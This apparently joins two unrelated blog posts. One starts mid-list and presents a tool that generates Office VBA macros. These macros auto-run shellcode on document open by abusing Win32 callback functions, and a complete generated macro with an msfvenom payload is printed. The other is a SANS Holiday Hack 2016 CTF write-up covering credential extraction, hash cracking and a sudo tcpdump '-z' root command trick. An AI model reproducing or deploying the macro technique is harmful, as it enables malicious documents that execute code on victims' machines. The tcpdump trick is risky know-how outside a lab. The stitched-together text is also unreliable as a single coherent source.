EnumPwrSchemes EnumResourceLanguagesA EnumResourceLanguagesExA
EnumResourceLanguagesExW EnumResourceLanguagesW EnumResourceNamesA
EnumResourceNamesExA EnumResourceNamesExW EnumResourceNamesW
EnumResourceTypesA EnumResourceTypesW EnumResourceTypesExA
EnumResourceTypesExW EnumResourceTypesW EnumSystemCodePagesA
EnumSystemCodePagesW EnumSystemLanguageGroupsA EnumSystemLanguageGroupsW
EnumSystemLocalesA EnumSystemLocalesW EnumThreadWindows
EnumTimeFormatsA EnumTimeFormatsW EnumUILanguagesA
EnumUILanguagesW EnumWindowStationsA EnumWindowStationsW
EnumWindows EnumerateLoadedModules EnumerateLoadedModulesEx
EnumerateLoadedModulesExW EventRegister GetApplicationRecoveryCallback
GrayStringA GrayStringW KsCreateFilterFactory
KsMoveIrpsOnCancelableQueue KsStreamPointerClone KsStreamPointerScheduleTimeout
LineDDA MFBeginRegisterWorkQueueWithMMCSS MFBeginUnregisterWorkQueueWithMMCSS
MFPCreateMediaPlayer MQReceiveMessage MQReceiveMessageByLookupId
NotifyIpInterfaceChange NotifyStableUnicastIpAddressTable NotifyTeredoPortChange
NotifyUnicastIpAddressChange PerfStartProvider PlaExtractCabinet
ReadEncryptedFileRaw RegisterApplicationRecoveryCallback RegisterForPrintAsyncNotifications
RegisterServiceCtrlHandlerExA RegisterServiceCtrlHandlerExW RegisterWaitForSingleObject
RegisterWaitForSingleObjectEx SHCreateThread SHCreateThreadWithHandle
SendMessageCallbackA SendMessageCallbackW SetTimerQueueTimer
SetWinEventHook SetWindowsHookExA SetWindowsHookExW
SetupDiRegisterDeviceInfo SymEnumLines SymEnumLinesW
SymEnumProcesses SymEnumSourceLines SymEnumSourceLinesW
SymEnumSymbols SymEnumSymbolsForAddr SymEnumSymbolsForAddrW
SymEnumSymbolsW SymEnumTypes SymEnumTypesByName
SymEnumTypesByNameW SymEnumTypesW SymEnumerateModules
SymEnumerateModules64 SymEnumerateSymbols SymEnumerateSymbols64
SymEnumerateSymbolsW SymSearch SymSearchW
TranslateBitmapBits WPUQueryBlockingCallback WdsCliTransferFile
WdsCliTransferImage WinBioCaptureSampleWithCallback WinBioEnrollCaptureWithCallback
WinBioIdentifyWithCallback WinBioLocateSensorWithCallback WinBioRegisterEventMonitor
WinBioVerifyWithCallback WlanRegisterNotification WriteEncryptedFileRaw
WsPullBytes WsPushBytes WsReadEnvelopeStart
WsRegisterOperationForCancel WsWriteEnvelopeStart mciSetYieldProc
midiInOpen midiOutOpen mixerOpen
mmioInstallIOProcA mmioInstallIOProcW waveInOpen

Out of that list, I was able to get the 49 functions, highlighted in red, to execute basic Calc shellcode with little to no additional interaction. At most, I had to provide some unique data, such as a handle to a process or specific values, but for the most part they are standalone and accept a 0 or 1 as values to every other argument the function needs.

I wrapped all of this into a small script I'm calling trigen (think 3 combo-generator) which randomly puts together a VBA macro using API calls from pools of functions for allocating memory (4 total), copying shellcode to memory (2 total), and then finally abusing the Win32 function call to get code execution (48 total - I left SetWinEventHook out due to the aforementioned need to chain functions). In total, there are 4 x 2 x 48 = 384 different possible macro combinations that it can spit out.
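To sanity check that count, here is a tiny sketch that enumerates every triple. The pool entries are placeholder labels, not the real function names trigen uses, and this is not code from the tool itself.

```python
from itertools import product

# Placeholder labels only; the real pools hold Win32 function names.
alloc_pool = [f"alloc_{i}" for i in range(4)]   # memory allocation choices
write_pool = [f"write_{i}" for i in range(2)]   # memory copy choices
exec_pool = [f"exec_{i}" for i in range(48)]    # callback-abuse choices

# Every macro is one pick from each pool, so the total is the Cartesian product.
combos = list(product(alloc_pool, write_pool, exec_pool))

if __name__ == "__main__":
    print(len(combos))
```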

The tool can be downloaded from here and will generate output similar to the below. It takes one argument, which is the hex-string of the shellcode, but it will do some minimal parsing of msfvenom output too (C or Py).

# python trigen.py "$(msfvenom --payload windows/exec CMD='calc.exe' -f c)" No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 193 bytes ################################################ # # # Copy VBA to Microsoft Office 97-2003 DOC # # # # Alloc: HeapAlloc # # Write: RtlMoveMemory # # ExeSC: EnumSystemCodePagesW # # # ################################################ Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long Private Sub Document_Open() Dim shellCode As String Dim shellLength As Byte Dim byteArray() As Byte Dim memoryAddress As Long Dim zL As Long zL = 0 Dim rL As Long shellCode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500" shellLength = Len(shellCode) / 2 ReDim byteArray(0 To shellLength) For i = 0 To shellLength - 1 If i = 0 Then pos = i + 1 Else pos = i * 2 + 1 End If Value = Mid(shellCode, pos, 2) byteArray(i) = Val("&H" & Value) Next rL = createMemory(&H40000, zL, zL) memoryAddress = allocateMemory(rL, zL, &H5000) copyMemory ByVal memoryAddress, 
byteArray(0), UBound(byteArray) + 1 executeResult = shellExecute(memoryAddress, zL) End Sub

The logic of the code is fairly straightforward: allocate memory, copy shellcode into memory, then transfer execution to the shellcode via the abused function call. The script will include the necessary code for each part.

I'm also including the VBA I worked from as I went through my testing, which has some notes and other tidbits. Feel free to experiment with that or pick up where I left off.


This year's SANS Holiday Hack was excellent! They absolutely killed it making a fun CTF this year! This year's challenge included a Christmas themed jRPG, a custom soundtrack, 21 achievements, and 10 questions that you need to answer to complete it.

I laughed, I yelled, I got to hang out and meet some cool like-minded people over a few nights, and I'm not ashamed to say I even bopped my head a bit to Christmas music.

The gist of the story is that Santa was kidnapped while delivering presents, and two children overheard it from their rooms. Throughout the game, you'll help investigate clues and solve puzzles to further progress the story and save Santa while figuring out who the nefarious villain was that took him.

This is a long post and covers answering every question in this year's challenge, beating each terminal, hacking each server, piecing together the final audio, and finding all of the coins to complete all of the achievements. I've tried to break it down as logically as possible and detail my methodology, failures, and notes throughout the journey. Enjoy!

Here are some festive reading tunes as well.

Question 01 - Santa's Tweets

1) What is the secret message in Santa's tweets?

The first thing we're provided with is Santa's business card, which includes his Twitter and Instagram handles.

Taking a look at his Twitter account, he has 350 tweets that all look encoded.

Initial thought was possibly XOR'd data with a key being some repeating pattern of Santa related text so I started copying it out, tweet by tweet, into a text file for better analysis. After maybe 15 or so tweets a definite pattern started to emerge, it just wasn't what I was expecting - a sideways "B" in ASCII art displayed. I went ahead and scrolled to the beginning of his Twitter timeline so that all 350 tweets were on my screen, then simply copy/pasta'd them out. Using a little grep-fu revealed the answer to Question 1.

$ grep -vE "Nov 14|Retweet|Like |More|@SantaWClaus|retweet" santawclaus_twitter

The answer is "BUG BOUNTY".

Question 02 - SantaGram ZIP

2) What is inside the ZIP file distributed by Santa's team?

Taking a look this time at Santa's Instagram, there are just three images. Only one is particularly interesting and I've put two red boxes over the details we need for this question.

It's pretty difficult to read but it's a file name and a FQDN that, when combined, allow us to download the ZIP file.

.\ -DestinationPath SantaGram_v4.2.zip www.northpolewonderland.com

The ZIP is password protected but using the "bugbounty" password from Question 1, it successfully extracts an APK file for the SantaGram application.

$ 7z x SantaGram_v4.2.zip

7-Zip [64] 9.38 beta Copyright (c) 1999-2014 Igor Pavlov 2015-01-03
p7zip Version 9.38.1 (locale=utf8,Utf16=on,HugeFiles=on,8 CPUs)

Processing archive: SantaGram_v4.2.zip

Extracting SantaGram_4.2.apk
Enter password (will not be echoed) :

Everything is Ok

Size: 2257390
Compressed: 1963026

Question 03 - APK Embedded Credentials

3) What username and password are embedded in the APK file?

Opening the APK up in Bytecode Viewer and doing a search for the string "password" returns a number of hits. Quickly looking at each one, we find the embedded credentials in the "SantaGram_4.2/com/northpolewonderland/santagram/b.class" file, within the "a" function.

Below is the Java representation of the decompiled smali code, which makes it easier to read.

JSONObject localJSONObject = new JSONObject();
try {
    localJSONObject.put("username", "guest");
    localJSONObject.put("password", "busyreindeer78");
    localJSONObject.put("type", "usage");
    localJSONObject.put("activity", paramString);
    localJSONObject.put("udid", Settings.Secure.getString(paramContext.getContentResolver(), "android_id"));
    new Thread(new b.1(paramContext, localJSONObject)).start();
    return;
}

The username is "guest" and the password is "busyreindeer78".

Question 04 - APK Audio File

4) What is the name of the audible component (audio file) in the SantaGram APK file?

This time, searching didn't come up with any quick hits so I began to look at the Decoded Resources within Bytecode Viewer. Under "SantaGram_4.2/res/raw/" we find the MP3 file "discombobulatedaudio1.mp3".

Question 05 - Password on the Cranbian System

5) What is the password for the "cranpi" account on the Cranberry Pi system?

This is the first question that requires you to interact with the jRPG game and where things start picking up! The first Elf NPC you encounter (Holly Evergreen) will give you a quest to find all five pieces of the Cranberry Pi system: heat sink, Cranberry Pi board, SD card, power cord, and an HDMI cable. These can be found around the map and are laid out to get you familiar with all parts of the game world. Once you've put them together and talked to Holly again, she'll give you a link to download the Cranbian image. The Cranberry Pi will also allow you to access terminals used in later parts of the game.

# 7z x cranbian.img.zip

7-Zip 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: cranbian.img.zip

Extracting cranbian-jessie.img

Everything is Ok

Size: 1389363200
Compressed: 250363700

Since we know we need to get a password for an account, along with the obvious references to Raspberry Pi, we know we're going to likely be cracking some Linux hashes so let's get-to-mountin'! The Elf Wunorse Openslae offers up a few hints on how to do this.

<Wunorse Openslae> - Hi, I'm Wunorse Openslae. I work on engineering projects for Santa.
<Wunorse Openslae> - A lot of people don't know this, but his sleigh can travel through space and time. I'm quite proud.
<Wunorse Openslae> - The SCADA interface for sleigh functions is controlled with a Cranberry Pi and Cranbian Linux.
<Wunorse Openslae> - It's really powerful to be able to switch out firmware builds by swapping SD cards.
<Wunorse Openslae> - Dealing with piles of SD cards though, that's a different story. Fortunately, this article gave me some ideas on better data management.
<Wunorse Openslae> - SantaGram? Yeah, it's popular up here. #elflife!

The first thing we do is check the image for sector size and starting offset of the Linux partition.

# fdisk -l cranbian-jessie.img

Disk cranbian-jessie.img: 1389 MB, 1389363200 bytes
255 heads, 63 sectors/track, 168 cylinders, total 2713600 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x5a7089a1

              Device Boot      Start         End      Blocks   Id  System
cranbian-jessie.img1            8192      137215       64512    c  W95 FAT32 (LBA)
cranbian-jessie.img2          137216     2713599     1288192   83  Linux

Since the sector size is 512 bytes, we can multiply it by the "Start" offset (137216) and arrive at the starting location of the partition, which is 70254592 bytes in. With this information, we can mount the filesystem.
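The arithmetic is simple enough to do by hand, but a quick sketch makes it repeatable. The values come straight from the fdisk output; the helper name partition_offset is just something I made up for the example.

```python
SECTOR_SIZE = 512               # bytes per sector, from the fdisk output
LINUX_PARTITION_START = 137216  # "Start" sector of the Linux partition


def partition_offset(start_sector, sector_size=SECTOR_SIZE):
    """Convert a partition's starting sector into a byte offset for mount."""
    return start_sector * sector_size


if __name__ == "__main__":
    print(partition_offset(LINUX_PARTITION_START))
```

The printed number is what gets passed to the "offset=" mount option.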

# mount -v -o offset=70254592 -t ext4 cranbian-jessie.img /mnt/img/
mount: enabling autoclear loopdev flag
mount: going to use the loop device /dev/loop0
/root/Desktop/cranbian-jessie.img on /mnt/img type ext4 (rw,offset=70254592)

Taking a look at "/etc/shadow" we can see the salted hash for the "cranpi" account we need to crack.


Before cracking it, I'll combine the "passwd" and "shadow" files to get a nice format for John.

$ ./unshadow cranpi_passwd cranpi_shadow root:*:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:*:2:2:bin:/bin:/usr/sbin/nologin sys:*:3:3:sys:/dev:/usr/sbin/nologin sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/usr/sbin/nologin man:*:6:12:man:/var/cache/man:/usr/sbin/nologin lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:*:8:8:mail:/var/mail:/usr/sbin/nologin news:*:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:*:13:13:proxy:/bin:/usr/sbin/nologin www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin backup:*:34:34:backup:/var/backups:/usr/sbin/nologin list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:*:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:*:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:*:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:*:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false messagebus:*:104:109::/var/run/dbus:/bin/false avahi:*:105:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false ntp:*:106:111::/home/ntp:/bin/false sshd:*:107:65534::/var/run/sshd:/usr/sbin/nologin statd:*:108:65534::/var/lib/nfs:/bin/false cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:1000:1000:,,,:/home/cranpi:/bin/bash
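If you don't have the unshadow helper handy, the merge it performs can be approximated in a few lines. This is only a sketch of the idea (swap the placeholder password field in each passwd line for the hash from shadow), not the actual John the Ripper implementation, and the sample data below is made up.

```python
def unshadow(passwd_text, shadow_text):
    """Merge passwd and shadow contents into passwd-style lines that carry the hash."""
    # Map each username to the second field of its shadow entry.
    hashes = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]

    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # skip blank or malformed lines
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return "\n".join(merged)


# Made-up sample data, not taken from the Cranbian image.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nalice:x:1000:1000:,,,:/home/alice:/bin/bash\n"
SAMPLE_SHADOW = "root:*:17067:0:99999:7:::\nalice:$6$salt$examplehash:17140:0:99999:7:::\n"

if __name__ == "__main__":
    print(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW))
```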

The Minty Candycane Elf hinted at using the "rockyou.txt" wordlist, which is standard on all Kali Linux distributions.

<Minty Candycane> - Howdy, my name is Minty Candycane. I'm on the red team, Rudolph's Red Team!
<Minty Candycane> - I've been spending a lot of time with NMAP. It is such a great port scanner! I'm very thorough so I check all the TCP ports to look for extra services.
<Minty Candycane> - NMAP is also great for finding extra files on web servers. The default scripts run with the "-sC" option work really well for me.
<Minty Candycane> - What did the elf say was the first step in using a Christmas computer?
<Minty Candycane> - "First, YULE LOGon"!
<Minty Candycane> - I crack people up.
<Minty Candycane> - Speaking of cracking, John the Ripper is fantastic for cracking hashes. It is good at determining the correct hashing algorithm.
<Minty Candycane> - I have a lot of luck with the RockYou password list.
<Minty Candycane> - Speaking of rocks, where do geologists like to relax?
<Minty Candycane> - In a rocking chair. HA!

After 6 minutes, John successfully cracks the password.

$ ./john --wordlist=rockyou.txt unshadow_cranpi
Loaded 1 password hash (sha512crypt [64/64])
guesses: 0 time: 0:00:00:11 0.08% (ETA: Tue Dec 13 15:39:08 2016) c/s: 1321 trying: chato - elodie
guesses: 0 time: 0:00:00:47 0.33% (ETA: Tue Dec 13 15:47:20 2016) c/s: 1241 trying: kruimel - ilovetyson
guesses: 0 time: 0:00:02:17 0.98% (ETA: Tue Dec 13 15:42:57 2016) c/s: 1228 trying: onlyyou1 - nippy1
yummycookies (cranpi)
guesses: 1 time: 0:00:06:06 DONE (Tue Dec 13 11:56:04 2016) c/s: 1241 trying: yveth - yoyoyo34
Use the "--show" option to display all of the cracked passwords reliably

Look at those abysmally slow cracking speeds...it's embarrassing! The answer for question 5 is "yummycookies".

Question 06 - Terminal Hacking to Save Santa

6) How did you open each terminal door and where had the villain imprisoned Santa?

There are 5 terminals strewn throughout the game. Each one of them is a unique puzzle to be solved and I'll cover them in their own respective sections.

Terminal 1 - Elf House #2

Each terminal includes a banner when you logon that tells you what needs to be accomplished.

*******************************************************************************
*                                                                             *
*To open the door, find both parts of the passphrase inside the /out.pcap file*
*                                                                             *
*******************************************************************************

For the first terminal, we can see that the logged in username is "scratchy" and there is an "itchy" user as well - an obvious Simpsons reference (which later becomes important). We can also see that we don't have permission to look at the "/out.pcap" file as it's owned by the "itchy" account with 0400 permissions.

scratchy@37b03af8cfa2:~$ ls
scratchy@37b03af8cfa2:~$ pwd
/home/scratchy
scratchy@37b03af8cfa2:~$ cd ..
scratchy@37b03af8cfa2:/home$ ls
itchy scratchy
scratchy@37b03af8cfa2:/home$ strings /out.pcap
strings: /out.pcap: Permission denied
scratchy@37b03af8cfa2:/home$ ls -lah /out.pcap
-r-------- 1 itchy itchy 1.1M Dec 2 15:05 /out.pcap
scratchy@37b03af8cfa2:~$ uname -a
Linux 37b03af8cfa2 3.16.0-4-amd64 #1 SMP Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux

While trying to figure out how to access this file, I checked my "sudo" access.

scratchy@37b03af8cfa2:~$ sudo -l
sudo: unable to resolve host 37b03af8cfa2
Matching Defaults entries for scratchy on 37b03af8cfa2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User scratchy may run the following commands on 37b03af8cfa2:
    (itchy) NOPASSWD: /usr/sbin/tcpdump
    (itchy) NOPASSWD: /usr/bin/strings

Ok, that seems pretty straightforward. We can run "tcpdump" and "strings" as user "itchy" with no password; this should be all we need to beat the challenge.

*NOTE* For whatever reason this terminal disconnected me constantly...whether it's because it was being bombarded by people or what, I don't know but it was really unstable.

scratchy@85f98e630f6f:~$ sudo -u itchy /usr/bin/strings /out.pcap sudo: unable to resolve host 85f98e630f6f ZAX< ZAX} ZAX, BGET /firsthalf.html HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept: */* Accept-Encoding: identity Host: Connection: Keep-Alive ZAX2 4hf@ Ehg@ OHTTP/1.0 200 OK ZAX ZAX# [hh@ OServer: SimpleHTTP/0.6 Python/2.7.12+ ZAXr rhi@ ODate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: text/html Ihj@ PContent-Length: 113 ZAX2 ZAXI dhk@ PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT P<html> <head></head> <body> <form> <input type="hidden" name="part1" value="santasli" /> </form> </body> </html> 4hm@ ZAXW @2/@ DGET /secondhalf.bin HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept: */* Accept-Encoding: identity Host: Connection: Keep-Alive ZAX THTTP/1.0 200 OK TServer: SimpleHTTP/0.6 Python/2.7.12+ ZAX" ,#"=X TDate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: application/octet-stream ZAXr ,#o=X ZAXr UContent-Length: 1048097 Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT 4-1@ UL}* cLgc %JK )$mg@ 8uTJ G]%s =3N\h x"9Bv/ ...

We have two "GET" method requests for files, "firsthalf.html" and "secondhalf.bin". In the first file, you can quickly see "part1" of the passphrase we need, "santasli". The second file is a BIN so we'll need to see if we can extract this from the PCAP.

The first approach I took was to copy all of the packet data out of the PCAP itself since I was limited in the tools I could use when accessing the "out.pcap" file.

scratchy@4122555f51e0:~$ sudo -u itchy /usr/sbin/tcpdump -r /out.pcap -s 1514 -X > ~/data.out
sudo: unable to resolve host 4122555f51e0
reading from file /out.pcap, link-type EN10MB (Ethernet)
scratchy@4122555f51e0:~$ ls
data.out
scratchy@4122555f51e0:~$ head data.out
11:28:00.520764 IP > Flags [S], seq 2857348850, win 65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 2773686863 ecr 0,sackOK,eol], length 0
0x0000: 4500 0040 8be7 4000 4006 b4fb c0a8 bc01 E..@..@.@.......
0x0010: c0a8 bc82 cb86 0050 aa4f aef2 0000 0000 .......P.O......
0x0020: b002 ffff 586c 0000 0204 05b4 0103 0305 ....Xl..........
0x0030: 0101 080a a553 1a4f 0000 0000 0402 0000 .....S.O........
11:28:00.520829 IP > Flags [S.], seq 2484589859, ack 2857348851, win 28960, options [mss 1460,sackOK,TS val 638274 ecr 2773686863,nop,wscale 7], length 0
0x0000: 4500 003c 0000 4000 4006 40e7 c0a8 bc82 E..<..@.@.@.....
0x0010: c0a8 bc01 0050 cb86 9417 d523 aa4f aef3 .....P.....#.O..
0x0020: a012 7120 fa03 0000 0204 05b4 0402 080a ..q.............
0x0030: 0009 bd42 a553 1a4f 0103 0307 ...B.S.O....

Once I had the contents of each packet inside of a file, I used a little Bash one-liner to parse out only the hex bytes.

scratchy@4122555f51e0:~$ cat packets_out 450000408be740004006b4fbc0a8bc01c0a8bc82cb860050aa4faef200000000b002ffff586c0000020405 b4010303050101080aa5531a4f00000000040200004500003c00004000400640e7c0a8bc82c0a8bc010050 cb869417d523aa4faef3a0127120fa030000020405b40402080a0009bd4 ...
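For reference, the same hex extraction can be sketched in Python. This is not the Bash one-liner I used on the terminal; it's an equivalent idea that assumes the usual "tcpdump -X" layout (an offset like "0x0000:", up to eight hex groups, then the ASCII column). The function name and sample text are mine.

```python
import re

# Offset, whitespace, then up to eight groups of 2 or 4 hex digits.
# Capping at eight groups keeps the ASCII column out of the match.
HEX_LINE = re.compile(
    r"^\s*0x[0-9a-f]{4}:\s+((?:(?:[0-9a-f]{4}|[0-9a-f]{2}) ?){1,8})"
)


def hex_from_tcpdump(text):
    """Return one continuous hex string built from the hex columns of tcpdump -X output."""
    chunks = []
    for line in text.splitlines():
        match = HEX_LINE.match(line)
        if match:  # header lines (timestamps, flags) simply do not match
            chunks.append(match.group(1).replace(" ", ""))
    return "".join(chunks)


# Two dump lines borrowed from the output above, with tcpdump's usual spacing.
SAMPLE = (
    "11:28:00.520764 IP > Flags [S], length 0\n"
    "\t0x0000:  4500 0040 8be7 4000 4006 b4fb c0a8 bc01  E..@..@.@.......\n"
    "\t0x0030:  0009 bd42 a553 1a4f 0103 0307            ...B.S.O....\n"
)

if __name__ == "__main__":
    hex_string = hex_from_tcpdump(SAMPLE)
    print(hex_string)
    # bytes.fromhex() turns the hex string back into raw bytes for carving.
    print(len(bytes.fromhex(hex_string)), "bytes")
```

Keep in mind this concatenates every packet back to back with no PCAP framing, which is why a carving step is still needed afterwards.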

I then copied the hex and, using the 010 Editor, pasted it into a new file as hex data. Below I highlighted the same HTML data I showed above to illustrate.

Once I had the binary file of packets, I used CapLoader to carve out all of the valid packets, which should be everything that was in the PCAP on the terminal.

Saving the carved out packets and opening them in Wireshark shows the expected data...except you'll notice on the right a huge amount of errors. Pro-tip, that's not a good sign.

Looking at the stream for the BIN file, we can see tons of bytes are missing.

I have half of the passphrase, so I decided to try and guess the second half by using my elite hacking skills (read: Google).

Ah, "Santa's Little Hackers" sounds right up the alley of the SANS Holiday Hack! Unfortunately it's not the password.

Then it slowly dawned on me...Itchy...Scratchy...Santa's Little Helper...mother-SANTA!

The password for terminal 1 is "santaslittlehelper".

*NOTE* While I couldn't get it to work in this context, I learned about a "tcpdump" flag that can potentially allow command execution, which is pretty rad.

-z postrotate-command
    Used in conjunction with the -C or -G options, this will make tcpdump run "postrotate-command file" where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.

A way to test this is to create a file… /tmp/.test and place the "id" command in it then run the command: "sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root"

Terminal 2 - Workshop - Santa's Office

Located in the bottom of the Workshop and leads to Santa's Office.

*******************************************************************************
*                                                                             *
*     To open the door, find the passphrase file deep in the directories.     *
*                                                                             *
*******************************************************************************

Taking a look at the files in our home directory shows a hidden directory called ".doormat". This seemed like as good a place to start as any.

elf@7a713a46f2d2:~$ ls -lah total 32K drwxr-xr-x 20 elf elf 4.0K Dec 6 19:40 . drwxr-xr-x 22 root root 4.0K Dec 6 19:40 .. -rw-r--r-- 1 elf elf 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 elf elf 3.9K Dec 6 19:40 .bashrc drwxr-xr-x 18 root root 4.0K Dec 6 19:40 .doormat -rw-r--r-- 1 elf elf 675 Nov 12 2014 .profile drwxr-xr-x 2 root root 4.0K Dec 6 19:39 temp drwxr-xr-x 2 root root 4.0K Dec 6 19:39 var

Since the banner says "deep in the directories", I decided to just recursively list all of the directories under ".doormat". Below is an excerpt from the command, showing a "key_for_the_door.txt".

./. / /\/\\: total 20K drwxr-xr-x 10 root root 4.0K Dec 6 19:40 . drwxr-xr-x 12 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 8 root root 4.0K Dec 6 19:40 Don't Look Here! drwxr-xr-x 2 root root 4.0K Dec 6 19:40 holiday drwxr-xr-x 2 root root 4.0K Dec 6 19:40 temp ./. / /\/\\/Don't Look Here!: total 20K drwxr-xr-x 8 root root 4.0K Dec 6 19:40 . drwxr-xr-x 10 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 6 root root 4.0K Dec 6 19:40 You are persistent, aren't you? drwxr-xr-x 2 root root 4.0K Dec 6 19:40 files drwxr-xr-x 2 root root 4.0K Dec 6 19:40 secret ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?: total 20K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 ' drwxr-xr-x 6 root root 4.0K Dec 6 19:40 . drwxr-xr-x 8 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 cookbook drwxr-xr-x 2 root root 4.0K Dec 6 19:40 temp ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/': total 12K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . drwxr-xr-x 6 root root 4.0K Dec 6 19:40 .. -rw-r--r-- 1 root root 17 Dec 6 19:39 key_for_the_door.txt ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook: total 8.0K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . drwxr-xr-x 6 root root 4.0K Dec 6 19:40 .. ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp: total 8.0K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . drwxr-xr-x 6 root root 4.0K Dec 6 19:40 ..
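Eyeballing a recursive listing works, but with directory names this hostile a programmatic search is less error prone. Below is a minimal sketch using os.walk; it's not what I ran on the terminal (I just used a recursive "ls"), and find_files is a name I made up.

```python
import os


def find_files(root, filename):
    """Walk root recursively and return every path whose basename equals filename."""
    matches = []
    for dirpath, _dirnames, filenames in os.walk(root):
        # os.walk hands back raw names, so spaces, quotes and backslashes are no problem.
        if filename in filenames:
            matches.append(os.path.join(dirpath, filename))
    return sorted(matches)


if __name__ == "__main__":
    # Search from the current directory for the file named in the listing above.
    for path in find_files(".", "key_for_the_door.txt"):
        print(path)
```

Since the paths come back as plain strings, they can be handed straight to open() without fighting shell quoting.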

Last, a quick "cat" of the file.

elf@7a713a46f2d2:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'$ cat key_for_the_door.txt
key: open_sesame

The password for terminal 2 is "open_sesame".

Terminal 3 - Workshop - DFER

Located at the top of the Workshop.

*******************************************************************************
*                                                                             *
*  Find the passphrase from the wumpus. Play fair or cheat; it's up to you.   *
*                                                                             *
*******************************************************************************

In the home directory for the user, we find a binary called "wumpus" which turns out to be an old text-based game called "Hunt the Wumpus", created in 1973. You essentially need to locate the Wumpus monster inside this labyrinth while avoiding bats and pitfalls.

elf@59db04db9088:~$ ls -lah total 48K drwxr-xr-x 2 elf elf 4.0K Dec 12 21:52 . drwxr-xr-x 6 root root 4.0K Dec 12 21:52 .. -rw-r--r-- 1 elf elf 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 elf elf 3.9K Dec 12 21:52 .bashrc -rw-r--r-- 1 elf elf 675 Nov 12 2014 .profile -rwxr-xr-x 1 root root 28K Dec 5 23:32 wumpus elf@59db04db9088:~$ ./wumpus Instructions? (y-n) y Sorry, but the instruction file seems to have disappeared in a puff of greasy black smoke! (poof) You're in a cave with 20 rooms and 3 tunnels leading from each room. There are 3 bats and 3 pits scattered throughout the cave, and your quiver holds 5 custom super anti-evil Wumpus arrows. Good luck. You are in room 11 of the cave, and have 5 arrows left. *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 4, 7, and 18.

